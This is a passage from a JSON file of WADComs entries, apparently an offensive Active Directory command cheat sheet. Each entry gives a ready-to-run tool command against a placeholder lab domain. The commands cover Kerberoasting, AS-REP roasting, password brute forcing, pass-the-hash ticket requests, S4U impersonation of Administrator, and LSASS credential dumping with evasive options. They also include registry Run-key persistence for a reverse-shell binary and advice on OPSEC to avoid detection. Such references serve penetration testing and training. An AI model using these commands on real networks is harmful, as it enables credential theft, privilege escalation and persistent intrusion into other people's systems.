{$_.\"msDS-AllowedToActOnBehalfOfOtherIdentity\"} | select Name,DNSHostName }\n\n# 4. RBCD (which object can configure it - write access)\n(Get-ADForest).Domains | % { Get-ADComputer -Filter * -Properties nTSecurityDescriptor -Server $_ | ? {$_.nTSecurityDescriptor.Access | ? {$_.ActiveDirectoryRights -match \"GenericWrite|WriteProperty\" -and $_.IdentityReference -notmatch \"SYSTEM|Domain Admins\"}} | select Name }","description":"Having imported the pwsh AD module referenced in the project, we can begin to use it to enumerate for potential points of exploit\none of the prime being kerberos delegation attacks. The following 4 line commands will enumerate the entire AD forest for RBCD, Constrained and Unconstrained delegation attacks.\nNote that we will also factor in protocol trainsiton as those change the attack vector slightly. See references below\n","mitre":[],"requires":["PowerShell"],"references":["https://redfoxsec.com/blog/attacking-kerberos-delegation/","https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html","https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/","https://github.com/samratashok/ADModule"]},{"id":"wadcoms:PwshADmodule-Initial-Enum","toolId":"wadcoms:PwshADmodule","toolName":"PwshADmodule","name":"PwshADmodule-Initial-Enum","source":"WADComs","platform":["Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"#Getting all DCs in the forest\n(Get-ADForest).Domains | % { Get-ADDomainController -DomainName $_ -Discover }\n\n#Getting all users in the forest\n(Get-ADForest).Domains | % { Get-ADUser -Filter * -Server $_ }\n\n#Getting all computers in the forest\n(Get-ADForest).Domains | % { Get-ADComputer -Filter * -Server $_ }\n\n#Mapping out entire trust relationships\nGet-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)' | Select-Object Source,Target,Name\n\n#Getting all groups in a domain. Note that the select statement will limit the output to only the matching fields the object contains\nGet-ADGroup -Filter * | Select-Object SamAccountName, GroupScope, DistinguishedName","description":"These commands provide a quick refernece for using the AD module to get situational awerness of the AD environment.\nNote that to get more commands that you can run, use the get command cmdlet, e.g. `Get-Command -Module ActiveDirectory` But Thes\nare the standard commands that will get you standard. Feel free to replace the first pipe with the -server \"your domain\" if you dont want\nto enumarate the entire forest. For more info on using the AD module, please check out our discussion on the AD module in WADCOMs.\n","mitre":[],"references":["https://docs.microsoft.com/en-us/powershell/module/activedirectory/","https://github.com/samratashok/ADModule"]},{"id":"wadcoms:PyLDAPmonitor","toolId":"wadcoms:PyLDAPmonitor","toolName":"PyLDAPmonitor","name":"PyLDAPmonitor","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 ldapmonitor.py -u 'john' -d 'TEST.local' -p 'password123' --dc-ip 10.10.10.1","description":"ldapmonitor.py allows you to monitor creation, deletion and changes to LDAP objects live during your pentest.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username","Hash"],"services":["LDAP","Kerberos","NTLM"],"references":["https://github.com/p0dalirius/LDAPmonitor/tree/master/python"]},{"id":"wadcoms:PyWhisker","toolId":"wadcoms:PyWhisker","toolName":"PyWhisker","name":"PyWhisker","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 pywhisker.py -d \"test.local\" -u \"john\" -p \"password123\" --target \"user2\" --action \"list\" --dc-ip \"10.10.10.1\"","description":"pyWhisker is a tool allowing users to manipulate the msDS-KeyCredentialLink attribute of a target user/computer to obtain full control over that object. It's based on Impacket and on our Python equivalent of Michael Grafnetter's DSInternals called PyDSInternals. This tool, along with Dirk-jan's PKINITtools allow for a complete primitive exploitation on UNIX-based systems only.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["Kerberos"],"references":["https://github.com/shutdownrepo/pywhisker"]},{"id":"wadcoms:RPCClient-Anonymous","toolId":"wadcoms:RPCClient","toolName":"RPCClient","name":"RPCClient-Anonymous","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"rpcclient -U '' -N 10.10.10.1","description":"rpcclient is a tool used for executing client side MS-RPC functions to manage Windows NT clients from Unix workstatios. From an offensive security standpoint, it can be used to enumerate users, groups, and other potentially sensitive information. The following command attempt to connect to the NetBIOS server anonymously, in order to enumerate using MS-RPC available commands/functions.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No_Creds"],"services":["RPC"],"references":["https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html","https://www.ired.team/offensive-security/enumeration-and-discovery/enumerating-windows-domains-using-rpcclient-through-socksproxy-bypassing-command-line-logging"]},{"id":"wadcoms:Regexe-Persistence","toolId":"wadcoms:Regexe","toolName":"Regexe","name":"Regexe-Persistence","source":"WADComs","platform":["Windows"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"reg.exe add \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v Persistence /t REG_SZ /d \"C:\\Path\\To\\revshell.exe\"\n\nreg.exe add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v Persistence /t REG_SZ /d \"C:\\Path\\To\\revshell.exe\"","description":"It is possible to gain persistence on a windows machine by adding reg keys that will execute an arbitrary payload during logon or startup. Keys added to the HKLM hive will execute on startup. Keys added to the HKCU hive will execute when the corresponding user logs on. Adding keys into the HKLM hive will require an elevated shell. There are four keys that can be used: Run, RunOnce, RunServices, and RunServicesOnce. By default, a RunOnce key is deleted after the specified command is executed. The path for these keys is the same for the HKLM and HKCU hives.\n\nCommand Reference:\n\n\tValue Name: Persistence\n\n\tRegKey data type: REG_SZ\n\n\tData: \"C:\\Path\\To\\revshell.exe\"\n\n\tKeyName: \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\n","mitre":[],"requires":["Shell"],"references":["https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/","https://www.hackingarticles.in/windows-persistence-using-winlogon/","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg","https://docs.microsoft.com/en-us/windows-hardware/drivers/install/runonce-registry-key"]},{"id":"wadcoms:Responder-Analyze","toolId":"wadcoms:Responder","toolName":"Responder","name":"Responder-Analyze","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"Responder -I eth0 -A","description":"Responder is an LLMNR, NBT-NS, and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix. By default, the tool will only answer to File Server Service request, which is for SMB. The following command will put Responder in analyze mode, listening for NBT-NS, BROWSER, and LLMNR requests without responding.\n\nCommand Reference:\n\n\tInterface: eth0\n","mitre":[],"requires":["No_Creds"],"services":["NTLM","SMB"],"references":["https://github.com/lgandx/Responder","https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/"]},{"id":"wadcoms:Rubeus-ASREPRoast","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-ASREPRoast","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt","description":"Rubeus' `asreproast` module will attempt to harvest the non-preauth AS_REP responses for a given list of usernames. These responses will be encrypted with the user's password, which can then be cracked offline. The following command is run on a Windows machine in the victim domain.\n\nCommand Reference:\n\n\tOutput File: hashes.txt\n","mitre":[],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://github.com/GhostPack/Rubeus#asreproast"]},{"id":"wadcoms:Rubeus-AskTGT","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-AskTGT","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"Rubeus.exe asktgt /domain:test.local /user:john /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt","description":"Rubeus' `asktgt` module uses a valid user's NTLM hash to request Kerberos tickets, in order to access any service or machine where that user has permissions.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n","mitre":[],"requires":["Hash","Username"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://github.com/GhostPack/Rubeus#asktgt"]},{"id":"wadcoms:Rubeus-Brute","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Brute","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"Rubeus.exe /users:usernames.txt /passwords:passwords.txt /domain:test.local /outfile:found_passwords.txt","description":"Rubeus' `brute` module bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication. The following command will attempt to brute force valid username and passwords logins given a list of usernames and a list of passwords.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername List: usernames.txt\n\n\tPassword List: passwords.txt\n\n\tOutput File: found_passwords.txt\n","mitre":[],"requires":["No_Creds"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://github.com/GhostPack/Rubeus#brute"]},{"id":"wadcoms:Rubeus-Kerberoast","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Kerberoast","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"Rubeus.exe kerberoast /outfile:hashes.txt","description":"Rubeus' `kerberoast` module will attempt to fetch Service Principal Names that are associated with normal user accounts. What is returned is a ticket that is encrypted with the user account's password, which can then be bruteforced offline. The following command is run on a Windows machine in the victim domain.\n\nCommand Reference:\n\n\tOutput File: hashes.txt\n","mitre":[],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://github.com/GhostPack/Rubeus#kerberoast"]},{"id":"wadcoms:Rubeus-s4u","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-s4u","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution","Lateral Movement"],"nativeCategory":["Exploitation","Lateral Movement","Privilidge Escalation"],"command":"Rubeus.exe s4u /user:john$ /aes256:2a3de7fe356ee524cc9f3d579f2e0aa7 /impersonateuser:Administrator /msdsspn:time/dc.test.local /altservice:ldap /ptt","description":"Rubeus' `s4u` module performs Kerberos constrained delegation attacks using the S4U2Self and S4U2Proxy. This technique abuses accounts configured with delegation privileges (msDS-AllowedToDelegateTo) to impersonate any domain user and further alter the service specified since SPNs are stored in plaintext and thus access any service on the target system as any user\n\nCommand Reference:\n\n\tDomain: test.local\n\n SPN: time/dc.test.local\n\n alternative service: ldap(can chose any valid services such as HTTP for remoting access)\n\n\tUsername: john$\n\n\tHash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n","mitre":[],"requires":["Hash","Username","target","service"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/credential-access/steal-or-forge-kerberos-tickets/constrained-delegation","https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation"]},{"id":"wadcoms:SMBClient-Enum-Share-Anonymous","toolId":"wadcoms:SMBClient","toolName":"SMBClient","name":"SMBClient-Enum-Share-Anonymous","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"smbclient \\\\\\\\test.local\\\\public -I 10.10.10.1 -N","description":"Smbclient is a tool used to communicate with SMB servers. The following command will connect to an SMB share `public` using anonymous login.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tSMB Share: public\n","mitre":[],"requires":["No_Creds"],"services":["SMB"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html","https://www.madirish.net/59"]},{"id":"wadcoms:SMBClient-Enum-Share","toolId":"wadcoms:SMBClient","toolName":"SMBClient","name":"SMBClient-Enum-Share","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"smbclient \\\\\\\\test.local\\\\C$ -I 10.10.10.1 -U john password123","description":"Smbclient is a tool used to communicate with SMB servers. The following command will connect to an SMB share `C$` using valid credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tSMB Share: C$\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html","https://www.madirish.net/59"]},{"id":"wadcoms:SMBClient-List-Share-PTH","toolId":"wadcoms:SMBClient","toolName":"SMBClient","name":"SMBClient-List-Share-PTH","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"smbclient -L \\\\10.10.10.1 -U test.local/john --pw-nt-hash XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","description":"Smbclient is a tool used to communicate with SMB servers. The following command will list out all available shares on the target ip using user John hash on test domain.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n","mitre":[],"requires":["Username","Hash"],"services":["SMB"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html"]},{"id":"wadcoms:SMBClient-List-Shares-Anonymous","toolId":"wadcoms:SMBClient","toolName":"SMBClient","name":"SMBClient-List-Shares-Anonymous","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"smbclient -L \\\\test.local -I 10.10.10.1 -N","description":"Smbclient is a tool used to communicate with SMB servers. The following command will list out all available shares on the target server using anonymous login.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n","mitre":[],"requires":["No_Creds"],"services":["SMB"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html"]},{"id":"wadcoms:SMBClient-List-Shares","toolId":"wadcoms:SMBClient","toolName":"SMBClient","name":"SMBClient-List-Shares","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"smbclient -L \\\\test.local -I 10.10.10.1 -U john password123","description":"Smbclient is a tool used to communicate with SMB servers. The following command will list out all available shares on the target server using valid credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html"]},{"id":"wadcoms:SMBMap-Enum-File","toolId":"wadcoms:SMBMap","toolName":"SMBMap","name":"SMBMap-Enum-File","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 smbmap.py --host-file smb-hosts.txt -u john -p 'password123' -d test.local -F password","description":"SMBMap is a tool used to enumerate SMB share drives, including listing share drive permissions, share contents, upload/download functionality, file name enumeration, and remote command execution. The following command will enumerate a list of SMB hosts for files and filenames containing the keyword 'password'.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tSMB Hosts: smb-hosts.txt\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/ShawnDEvans/smbmap","https://www.nopsec.com/blog/smbmap-wield-it-like-the-creator/"]},{"id":"wadcoms:SMBMap-Enum-Share-Anonymous","toolId":"wadcoms:SMBMap","toolName":"SMBMap","name":"SMBMap-Enum-Share-Anonymous","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 smbmap.py --host-file smb-hosts.txt -d test.local -L","description":"SMBMap is a tool used to enumerate SMB share drives, including listing share drive permissions, share contents, upload/download functionality, file name enumeration, and remote command execution. The following command will enumerate a list of SMB hosts for accessible SMB shares, both local and mapped drives, without credentials (null session).\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tSMB Hosts: smb-hosts.txt\n","mitre":[],"requires":["No_Creds"],"services":["SMB"],"references":["https://github.com/ShawnDEvans/smbmap","https://www.nopsec.com/blog/smbmap-wield-it-like-the-creator/"]},{"id":"wadcoms:SMBMap-Enum-Share","toolId":"wadcoms:SMBMap","toolName":"SMBMap","name":"SMBMap-Enum-Share","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 smbmap.py --host-file smb-hosts.txt -u john -p 'password123' -d test.local -L","description":"SMBMap is a tool used to enumerate SMB share drives, including listing share drive permissions, share contents, upload/download functionality, file name enumeration, and remote command execution. The following command will enumerate a list of SMB hosts for accessible SMB shares, both local and mapped drives, using valid credentials.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tSMB Hosts: smb-hosts.txt\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/ShawnDEvans/smbmap","https://www.nopsec.com/blog/smbmap-wield-it-like-the-creator/"]},{"id":"wadcoms:SafetyKatz","toolId":"wadcoms:SafetyKatz","toolName":"SafetyKatz","name":"SafetyKatz","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation","Discovery"],"nativeCategory":["PrivEsc","Enumeration"],"command":"safetykatz.exe \"privilege::debug\" \"sekurlsa::evasive-logonpasswords\" \"exit\"","description":"SafetyKatz.exe is part of the GhostPack suite of tools and is a combination of SharpDump and Mimikatz. The following command will dump the LSASS process and run Mimikatz to extract credentials from the dumped process. Safetykatz also supports a number of mimikatz native commands such as \"sekurlsa::evasive-keys\" etc. The evasive switch in lab and production enviroments up to windows 2016 has been noted to successfully run where the non \"evasive\" switches had not\n","mitre":[],"requires":["Shell"],"references":["https://github.com/GhostPack/SafetyKatz","https://www.harmj0y.net/blog/redteaming/ghostpack/"]},{"id":"wadcoms:Seatbelt","toolId":"wadcoms:Seatbelt","toolName":"Seatbelt","name":"Seatbelt","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation","Persistence"],"nativeCategory":["PrivEsc","Persistence"],"command":"Seatbelt.exe -group=all -full > output.txt","description":"Seatbelt.exe is part of the GhostPack suite of tools that will perform a lot of \"safety checks\" on the Windows host and collect system data that could be useful for potential privilege escalation or persistence methods. The following command will run all checks on the system and store the output in a file (WARNING: will collect a lot of data. remove `-full` for less output).\n\nCommand Reference:\n\n\tRun all checks: -group=all\n\n\tOutput File: output.txt\n","mitre":[],"requires":["Shell"],"references":["https://github.com/GhostPack/Seatbelt","https://www.harmj0y.net/blog/redteaming/ghostpack/"]},{"id":"wadcoms:SharpDump","toolId":"wadcoms:SharpDump","toolName":"SharpDump","name":"SharpDump","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation","Discovery"],"nativeCategory":["PrivEsc","Enumeration"],"command":"SharpDump.exe","description":"SharpDump.exe is part of the GhostPack suite of tools and is a C# port of PowerSploit's Out-Minidump.ps1. It can dump the process for LSASS or a specific process given it's PID. This dump can then be fed into mimikatz to extract sensitive information. The following command simply dumps the LSASS process.\n","mitre":[],"requires":["Shell"],"references":["https://github.com/GhostPack/SharpDump","https://www.harmj0y.net/blog/redteaming/ghostpack/"]},{"id":"wadcoms:SharpHound-LDAP","toolId":"wadcoms:SharpHound","toolName":"SharpHound","name":"SharpHound-LDAP","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Discovery"],"nativeCategory":["PrivEsc","Enumeration"],"command":"SharpHound.exe --CollectionMethods All --LdapUsername john --LdapPassword password123 --ZipFileName output.zip","description":"SharpHound.exe is the official data collector for BloodHound, written in C# and uses Windows API functions and LDAP namespace functions to collect data from domain controllers and domain-joined Windows systems. This data can then be fed into BloodHound to enumerate potential paths of privilege escalation. The following command peforms all collection methods and will use the provided LDAP credentials when performing LDAP collection methods, and stores the output in a zip file that can be directly placed in the BloodHound GUI.\n\nCommand Reference:\n\n\tLDAP Username: john\n\n\tLDAP Password: password123\n\n\tOutput File: output.zip\n","mitre":[],"requires":["Shell","Username","Password"],"services":["LDAP"],"references":["https://github.com/BloodHoundAD/SharpHound3","https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.html"]},{"id":"wadcoms:SharpHound","toolId":"wadcoms:SharpHound","toolName":"SharpHound","name":"SharpHound","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation","Discovery"],"nativeCategory":["PrivEsc","Enumeration"],"command":"SharpHound.exe --CollectionMethods All --ZipFileName output.zip\n#Using PowerShell module\npowershell -ep bypass \n.\\SharpHound.ps1\nInvoke-BloodHound -CollectionMethod All -Domain domain.tld -ZipFileName output.zip","description":"SharpHound.exe and SharpHound.ps1 are the official data collector for BloodHound, written in C# or Powershell and uses Windows API functions and LDAP namespace functions to collect data from domain controllers and domain-joined Windows systems. This data can then be fed into BloodHound to enumerate potential paths of privilege escalation. The following command peforms all collection methods and stores the output in a zip file that can be directly placed in the BloodHound GUI.\n\nCommand Reference:\n\n\tOutput File: output.zip\n","mitre":[],"requires":["Shell"],"references":["https://github.com/BloodHoundAD/SharpHound3","https://bloodhound.specterops.io/collect-data/ce-collection/sharphound","https://github.com/ZishanAdThandar/pentest/blob/main/notes/ActiveDirectory.md#bloodhound"]},{"id":"wadcoms:SharpLDAPmonitor","toolId":"wadcoms:SharpLDAPmonitor","toolName":"SharpLDAPmonitor","name":"SharpLDAPmonitor","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"SharpLDAPmonitor.exe /dcip:10.10.10.1 /user:TEST.local\\john /pass:password123","description":"SharpLDAPmonitor.exe allows you to monitor creation, deletion and changes to LDAP objects live during your pentest.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["LDAP","Kerberos","NTLM"],"references":["https://github.com/p0dalirius/LDAPmonitor/tree/master/csharp"]},{"id":"wadcoms:SharpUp","toolId":"wadcoms:SharpUp","toolName":"SharpUp","name":"SharpUp","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation"],"nativeCategory":["PrivEsc"],"command":"SharpUp.exe > output.txt","description":"SharpUp.exe is part of the GhostPack suite of tools and is a C# port of PowerUp that will perform numerous privilege escalation checks. The following command will run all priv esc checks and store the output in a file.\n\nCommand Reference:\n\n\tOutput File: output.txt\n","mitre":[],"requires":["Shell"],"references":["https://github.com/GhostPack/SharpUp","https://www.harmj0y.net/blog/redteaming/ghostpack/"]},{"id":"wadcoms:SharpWMI","toolId":"wadcoms:SharpWMI","toolName":"SharpWMI","name":"SharpWMI","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"SharpWMI.exe action=query query=\"select * from win32_process\"","description":"SharpWMI.exe is part of the GhostPack suite of tools that provides WMI functionality, such as local/remote WMI queries, remote WMI process creation, and remote execution of arbitrary VBS through WMI events. The following command will simply list all processes running on the local system.\n\nCommand Reference:\n\n\tGet all processes: \"select * from win32_process\"\n","mitre":[],"requires":["Shell"],"services":["WMI"],"references":["https://github.com/GhostPack/SharpWMI","https://www.harmj0y.net/blog/redteaming/ghostpack/"]},{"id":"wadcoms:Snaffler","toolId":"wadcoms:Snaffler","toolName":"Snaffler","name":"Snaffler","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"Snaffler.exe -s -o snaffler_output.log -d test.local -c 10.10.10.1","description":"Snaffler is a tool used to enumerate sensitive data (passwords, PII, etc.) from file shares in Active Directory. It searches for interesting files based on file extensions, file names, and file content that's matched against regex. It's also highly configurable, allowing you to add your own regex searches. The following command will enumerate all machines in the domain and search for accessible file shares, checking for interesting files that might have sensitive data.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tDomain Controller: 10.10.10.1\n","mitre":[],"requires":["Shell"],"services":["SMB"],"references":["https://github.com/SnaffCon/Snaffler"]},{"id":"wadcoms:Windapsearch","toolId":"wadcoms:Windapsearch","toolName":"Windapsearch","name":"Windapsearch","source":"WADComs","platform":["Linux","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 windapsearch --dc-ip 10.10.10.1 -u test.local\\\\john -p password123 -U -G --da -m \"Remote Desktop Users\" -C -r","description":"windapsearch enumerates users, groups, and computers from a Windows domain through LDAP queries. The following command enumerates all 3 of the above mentioned using provided credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tEnum Users: -U\n\n\tEnum Groups: -G\n\n\tEnum Domain Admins: --da\n\n\tEnum members of group: -m \"Remote Desktop Users\"\n\n\tEnum Computers and resolve DNS: -C -r\n","mitre":[],"requires":["Username","Password"],"references":["https://github.com/ropnop/windapsearch","https://www.attackdebris.com/?p=470"]},{"id":"wadcoms:bloodyAD-Wite-Properties","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-Wite-Properties","source":"WADComs","platform":["Linux"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"bloodyAD --host 10.10.10.1 -d test.local -u john -p password123 -d test.local get writable --detail","description":"BloodyAD can be used to set, write and delete properties of objects in AD. Given a user:pass, you can use bloodyAD to which objects and what properties of\nthose objects are writeable to the user:pass given. Thus if you use -u john -p john, this command will show you what objects and properties\ncan john write to\n\nCommand Reference:\n Target IP: 10.10.10.1\n\n\tDomain: test.local\n\n Username: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"references":["https://github.com/CravateRouge/bloodyAD","https://adminions.ca/books/active-directory-enumeration-and-exploitation/page/bloodyad"]},{"id":"wadcoms:enum4linux-ng","toolId":"wadcoms:enum4linux","toolName":"enum4linux","name":"enum4linux-ng","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"enum4linux-ng 10.10.10.1","description":"enum4linux-ng is a modern reimplementation of enum4linux written in Python3. It is used to enumerate information from Windows and Samba systems, providing cleaner output and better support for modern protocols. The following command performs a full unauthenticated enumeration of the target.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No_Creds"],"services":["SMB"],"references":["https://github.com/cddmp/enum4linux-ng"]},{"id":"wadcoms:lsassy-credsdump","toolId":"wadcoms:lsassy","toolName":"lsassy","name":"lsassy-credsdump","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"lsassy -u john -p password123 -d test.local 10.10.10.1","description":"\"lsassy is a tool written in python released in 2021 to provide a varity of methods to dump credintials from a single/multiple remote targets. It uses a varity of differnt tactics that provide OPSEC benefits in some cases while also providing the operator options in how it executes remotely, which method it uses as well as the ability to replace the inbuild binaries with your own very easily. Note that if you had introduced nxc into the enviroment previously, then youre encouraged for OSPEC gains to use the built in lsass module. This holds true for many sources in this project that if you had introduced x y z tool; you are better off continuing to use those instead of constantly introducing new ones\"\n\nCommand reference:\n Password: password123\n Username: john\n Domain: test.local\n Target: 10.10.10.1\n","mitre":[],"requires":["Username","Password"],"services":["Kerberos","NTLM"],"references":["https://en.hackndo.com/remote-lsass-dump-passwords/","https://github.com/login-securite/lsassy?tab=readme-ov-file"]},{"id":"wadcoms:targetedKerberoast","toolId":"wadcoms:targetedKerberoast","toolName":"targetedKerberoast","name":"targetedKerberoast","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 targetedKerberoast.py -d test.local -u john -p password123 --dc-ip 10.10.10.1","description":"targetedKerberoast is a Python script that can, like many others (e.g. GetUserSPNs.py), print \"kerberoast\" hashes for user accounts that have a SPN set. This tool brings the following additional feature: for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute), print the \"kerberoast\" hash, and delete the temporary SPN set for that operation.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["Kerberos","NTLM"],"references":["https://github.com/ShutdownRepo/targetedKerberoast"]},{"id":"wadcoms:winPEAS","toolId":"wadcoms:winPEAS","toolName":"winPEAS","name":"winPEAS","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation"],"nativeCategory":["PrivEsc"],"command":"winpeas.exe cmd > output.txt","description":"winpeas.exe is a script that will search for all possible paths to escalate privileges on Windows hosts. The below command will run all priv esc checks and store the output in a file.\n\nCommand Reference:\n\n\tRun all checks: cmd\n\n\tOutput File: 